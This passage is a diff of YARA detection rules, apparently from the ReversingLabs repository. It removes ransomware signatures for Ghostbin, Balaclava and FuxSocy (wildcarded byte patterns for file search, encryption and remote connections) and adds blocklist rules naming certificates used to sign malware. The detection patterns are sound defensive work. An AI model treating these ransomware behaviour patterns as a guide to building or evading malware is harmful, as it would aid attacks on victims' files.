-            8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ??
-            ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ?? ?? 75 ?? B9
-            ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 66 8B 80
-            ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74
-            ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 83 B8
-            ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ?? 8D 55 ?? 8B 5D ?? 8B 83
-            ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45
-            ?? 8A 80 ?? ?? ?? ?? 2C ?? 72 ?? 74 ?? FE C8 74 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
-            45 ?? FF B0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 45 ?? FF B0 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? EB ?? 8B 45 ?? 8B 88
-            ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18
-            FF 53 ?? EB ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45 ?? 83 B8 ?? ?? ?? ?? ?? 74 ?? 8B 45 ??
-            80 B8 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ??
-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ??
-            8B 45 ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8
-            ?? ?? ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ??
-            B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 81 B8 ?? ?? ?? ?? ??
-            ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 88 ?? ?? ?? ?? 8D
-            45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 45
-            ?? 66 8B 80 ?? ?? ?? ?? 66 3D ?? ?? 7E ?? 66 3D ?? ?? 7D ?? 8B 45 ?? 66 83 B8 ?? ??
-            ?? ?? ?? 74 ?? 8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93 ?? ?? ?? ?? 8B 4D ?? B2 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 66 83 B8 ?? ?? ?? ?? ?? 74 ??
-            8B 5D ?? 8B 55 ?? 8B 83 ?? ?? ?? ?? FF 93
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $do_dll_stuff_and_create_thread and $find_files and $remote_connection and $remote_ftp_connection
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA L LIMITED" and ( pe.signatures [ i ] . serial == "00:aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" or pe.signatures [ i ] . serial == "aa:f6:5b:8e:7a:2e:68:bc:8c:9e:8f:27:33:1b:79:5c" ) and 1549324800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostbin : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_C6Ed0Efe2844Fa44Aae350C6845C3331 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ghostbin ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4d576854-7a30-527d-9a7a-f22018183540"
-		date = "2021-09-06"
-		modified = "2021-09-06"
+		id = "d748bea4-8d2b-53b2-8184-ea0972ad9199"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Ghostbin.yara#L1-L61"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3881e1c83ac2a31fdd8a081d3e6e6ea759771dbc183c3af9528930619bcddf9e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16396-L16414"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5c4afcd8ceb5cc2f1df2303183ede2081b86365eeee7d4e1319a8ed9a45bbf0b"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Ghostbin"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_env = {
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C
-            08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 18 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16
-            28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 19 FE 01 08 6F ?? ?? ?? ?? 18 FE 01 60 2C ?? 08
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 17 D6 0B 07 06 8E 69 32 ?? 00 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 2C ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F ?? 16 28 ?? ?? ?? ?? 26 DE ?? 28 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? DE ?? 2A
-        }
-		$encrypt_files = {
-            73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 25 6F ?? ?? ?? ?? 25 06 28 ?? ?? ?? ?? 03 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 0C 6F ?? ?? ??
-            ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 0B 07 8E 69 17 59 1F ?? 58 17 58 8D ?? ?? ?? ?? 0D 08
-            09 1F ?? 28 ?? ?? ?? ?? 07 16 09 1F ?? 07 8E 69 28 ?? ?? ?? ?? 09 2A
-        }
-		$find_files = {
-            02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 16 0B
-            2B ?? 06 07 9A 0C 7E ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 08 28 ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ??
-            ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? DE ?? 07 17 D6 0B
-            07 06 8E 69 32 ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ??
-            11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ??
-            DE ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE COMPANY OF WORDS LTD" and ( pe.signatures [ i ] . serial == "00:c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" or pe.signatures [ i ] . serial == "c6:ed:0e:fe:28:44:fa:44:aa:e3:50:c6:84:5c:33:31" ) and 1549324800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Balaclava : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Ede6Cfbf9Fa18337B0Fdb49C1F693020 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Balaclava ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1a17f2e8-f161-55bc-b44e-f8f47ebd9869"
-		date = "2020-10-01"
-		modified = "2020-10-01"
+		id = "0389d5ba-4535-5277-9c77-bd178e66417f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Balaclava.yara#L1-L113"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "01b43e6ea7ceebdbdda7e1f7c5bd2439a460b8aed4a1837755fa3679e9893ff3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16416-L16434"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a7f18d0028cbc0001a196bc915b7881244a5833dd65f96dd7d2e8ab1b0622e0c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Balaclava"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 83 EC ?? 53 56 8B 75 ?? 33 D2 57 6A ?? 5B 8B 7E ?? 89 55 ?? 8D 4F ?? 66 8B
-            07 03 FB 66 3B C2 75 ?? 2B F9 B9 ?? ?? ?? ?? D1 FF E8 ?? ?? ?? ?? 50 FF 76 ?? 89 45
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B
-            45 ?? 83 C0 ?? 89 45 ?? 8B D8 33 D2 8D 4B ?? 66 8B 03 83 C3 ?? 66 3B C2 75 ?? 2B D9
-            D1 FB 8D 04 3B 3D ?? ?? ?? ?? 7C ?? 8D 04 45 ?? ?? ?? ?? 50 39 56 ?? 74 ?? FF 76 ??
-            52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ??
-            ?? ?? 39 46 ?? 74 ?? 89 46 ?? 8B 46 ?? 33 C9 66 89 0C 78 8B 55 ?? F7 02 ?? ?? ?? ??
-            0F 85 ?? ?? ?? ?? 33 D2 8B C2 6A ?? 89 45 ?? 59 89 4D ?? 3B C1 7F ?? 03 C1 8B 4D ??
-            99 2B C2 D1 F8 89 45 ?? 8B 14 85 ?? ?? ?? ?? 66 8B 01 66 3B 02 75 ?? 66 85 C0 74 ??
-            66 8B 41 ?? 66 3B 42 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 D2 8B C2 EB ?? 1B
-            C0 83 C8 ?? 33 D2 85 C0 0F 84 ?? ?? ?? ?? 79 ?? 8B 4D ?? 8B 45 ?? 49 EB ?? 8B 45 ??
-            8B 4D ?? 40 89 45 ?? EB ?? 8B 45 ?? F6 00 ?? 0F 84 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ??
-            50 8B 46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? 8B 46 ??
-            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 74
-            ?? 83 7E ?? ?? 7E ?? FF 76 ?? 8B 4E ?? FF 76 ?? E8 ?? ?? ?? ?? 59 59 8B 4E ?? 8D 14
-        }
-		$find_files_p2 = {
-            3B A1 ?? ?? ?? ?? 56 89 44 51 ?? 66 A1 ?? ?? ?? ?? 66 89 44 51 ?? FF 46 ?? E8 ?? ??
-            ?? ?? FF 4E ?? E9 ?? ?? ?? ?? 39 56 ?? 0F 85 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ?? 50 8B
-            46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 5E ?? 83 C4 ?? 8B CB B8 ?? ??
-            ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ??
-            83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B CB 8D
-            51 ?? 66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 F9 ?? 72 ?? 8B CB 8D 51 ??
-            66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 C1 ?? 68 ?? ?? ?? ?? 8D 04 4B 50
-            FF 15 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 A8 ?? 74 ?? 83 E0 ??
-            50 FF 76 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? EB ?? 85 C0 75 ?? 6A ?? 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ??
-            ?? ?? ?? 6A ?? 58 3B C8 A1 ?? ?? ?? ?? 74 ?? 83 F8 ?? 74 ?? FF 76 ?? A1 ?? ?? ?? ??
-            33 D2 6A ?? 03 C1 59 F7 F1 FF 34 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ??
-            FF 05 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 6A
-            ?? 59 66 89 4C 78 ?? 33 C9 8B 46 ?? 66 89 0C 78 FF 75 ?? 8B 5D ?? 53 FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 5D ?? 33 FF 39 7E ??
-            75 ?? 89 3E 53 FF 15 ?? ?? ?? ?? 8B DF 8B 4D ?? E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5
-            5D C2
-        }
-		$encrypt_files_p1 = {
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 55 ?? 8B C1 89 45 ?? C7 45 ?? ?? ??
-            ?? ?? 33 F6 89 75 ?? 83 4D ?? ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75
-            ?? 56 68 ?? ?? ?? ?? 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ??
-            83 FB ?? 74 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 0B 45 ?? 74 ??
-            8B FE EB ?? 33 FF 47 89 7D ?? 85 FF 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89
-            45 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 8B C8 A1 ?? ?? ?? ?? EB ?? 8B
-            CE 85 C9 0F 84 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 EB ?? 8B C6 85 C0 0F 84
-            ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 7D ?? 57 53 FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? 83 CF ?? 89 7D ?? E9 ?? ?? ?? ?? 8B 45 ?? 3B C6 7C ?? 8B 4D ?? 7F ?? 81 F9 ?? ??
-            ?? ?? 76 ?? 81 E9 ?? ?? ?? ?? 1B C6 50 51 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 89
-        }
-		$encrypt_files_p2 = {
-            75 ?? 85 F6 75 ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 03 C7 50 53 FF 15 ?? ?? ??
-            ?? 8B FE 89 7D ?? EB ?? 56 56 6A ?? 5A 8B CB E8 ?? ?? ?? ?? 59 59 23 C2 8B FE 89 7D
-            ?? 85 FF 75 ?? 56 8D 45 ?? 50 6A ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
-            ?? ?? 8B 4D ?? FF 71 ?? FF 71 ?? 8D 41 ?? 50 FF 71 ?? 6A ?? 5A 8B 4D ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 0F B6 C0 23 F8 89 7D ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70
-            ?? FF 70 ?? 53 FF 15 ?? ?? ?? ?? 56 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 70 ?? 53 FF 15
-            ?? ?? ?? ?? 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 45 ?? 50 8B 55 ?? 52
-            8B 4D ?? 8B 45 ?? 03 C1 50 52 51 51 8B 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 56 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 56 56 33 D2 8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? FF 75 ?? 53 FF
-            15 ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8B 45 ?? 2D ?? ?? ?? ?? 8B 4D ?? 1B CE 51 50 33 D2
-            8B CB E8 ?? ?? ?? ?? 59 59 56 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 45 ?? 50 53 FF 15 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 4D ?? ?? E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? C3
-        }
-		$find_volumes = {
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 33 DB 53 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 56 53 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ??
-            ?? 89 5D ?? 6A ?? 5B 8D B5 ?? ?? ?? ?? 8D 4E ?? 33 D2 66 8B 06 83 C6 ?? 66 3B C2 75
-            ?? 2B F1 D1 FE 66 39 9D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66
-            83 BD ?? ?? ?? ?? ?? 75 ?? 66 39 9D ?? ?? ?? ?? 75 ?? 66 39 9C 75 ?? ?? ?? ?? 75 ??
-            33 C0 66 89 84 75 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 66 89 9C 75 ?? ?? ?? ?? 85 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 4D ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 FF 15 ??
-            ?? ?? ?? 8B 65 ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_volumes ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "START ARCHITECTURE LTD" and ( pe.signatures [ i ] . serial == "00:ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" or pe.signatures [ i ] . serial == "ed:e6:cf:bf:9f:a1:83:37:b0:fd:b4:9c:1f:69:30:20" ) and 1554940800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Fuxsocy : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects FuxSocy ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f4a45469-9d51-523f-8238-c7044f353cf6"
-		date = "2021-03-01"
-		modified = "2021-03-01"
+		id = "308a73cd-a142-56ad-8dca-808ab455b43e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.FuxSocy.yara#L1-L114"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8b3c04eb5d60fcc82e47cb8e78da0a98642666546d6799baef24b56926e3aceb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16436-L16454"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "af3cd543a6feec3118ba4e5fdc8455584aa763bd8339f036ab332977fc0fb20e"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FuxSocy"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            83 EC ?? 53 55 57 89 54 24 ?? 8B 54 24 ?? 51 33 DB E8 ?? ?? ?? ?? 8B E8 59 85 ED 0F
-            84 ?? ?? ?? ?? 8B 44 24 ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B CB E9
-            ?? ?? ?? ?? 53 53 FF 74 24 ?? 41 FF 74 24 ?? BF ?? ?? ?? ?? FF 74 24 ?? 3B C7 0F 42
-            F8 2B C7 89 4C 24 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ??
-            FF 74 24 ?? FF 15 ?? ?? ?? ?? 57 FF 74 24 ?? 8D 54 24 ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
-            59 59 57 8D 44 24 ?? 50 FF 74 24 ?? 33 C0 39 44 24 ?? 53 0F 94 C0 89 7C 24 ?? 50 53
-            55 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ??
-            ?? ?? ?? 53 8D 44 24 ?? 50 57 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 01 7C 24 ??
-            8B 4C 24 ?? 11 5C 24 ?? F6 C1 ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 44 24
-            ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 88 5C 24 ?? FF 74 24 ?? 8B 54 24 ?? 8B 4C 24 ?? E8
-            ?? ?? ?? ?? 59 8B 4C 24 ?? 55 89 41 ?? FF 15 ?? ?? ?? ?? 8A 5C 24 ?? 5F 5D 8A C3 5B
-            83 C4 ?? C3
-        }
-		$encrypt_files_2 = {
-            83 EC ?? 53 55 56 8B 74 24 ?? 8B C1 8B 36 57 89 54 24 ?? 89 44 24 ?? E8 ?? ?? ?? ??
-            8B F8 33 D2 8D 5F ?? 8B C6 F7 F3 33 C9 85 D2 0F 95 C1 89 54 24 ?? 33 D2 03 C8 89 4C
-            24 ?? 0F AF CF 89 4C 24 ?? E8 ?? ?? ?? ?? 8B E8 89 6C 24 ?? 85 ED 0F 84 ?? ?? ?? ??
-            33 D2 8B CF E8 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 64 24 ?? ??
-            48 89 6C 24 ?? 89 44 24 ?? 74 ?? 53 FF 74 24 ?? 89 5C 24 ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 44 24 ?? 57 50 56 33 C0 50 50 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 33 C9 85 FF 74 ?? 8B 54 24 ?? 8D 6E ?? 03 EF 8A 45 ?? 4D 88 04 11 41 3B CF
-            72 ?? 8B 6C 24 ?? 8B 44 24 ?? 03 44 24 ?? 01 5C 24 ?? 89 44 24 ?? 8B 44 24 ?? 40 89
-            44 24 ?? 3B 44 24 ?? 72 ?? 8B 44 24 ?? 85 C0 0F 45 D8 53 FF 74 24 ?? 89 5C 24 ?? 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 57 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF 15 ??
-            ?? ?? ?? 8B D8 F7 DB 1A DB 80 E3 ?? 33 C9 85 FF 74 ?? 8B 6C 24 ?? 8D 56 ?? 03 D7 8A
-            02 4A 88 04 29 41 3B CF 72 ?? 8B 6C 24 ?? 8B CE E8 ?? ?? ?? ?? 84 DB 75 ?? 8B CD E8
-            ?? ?? ?? ?? 33 ED EB ?? 32 DB EB ?? 8B 4C 24 ?? 8B 44 24 ?? 89 01 5F 5E 8B C5 5D 5B
-            83 C4 ?? C3
-        }
-		$find_files_1 = {
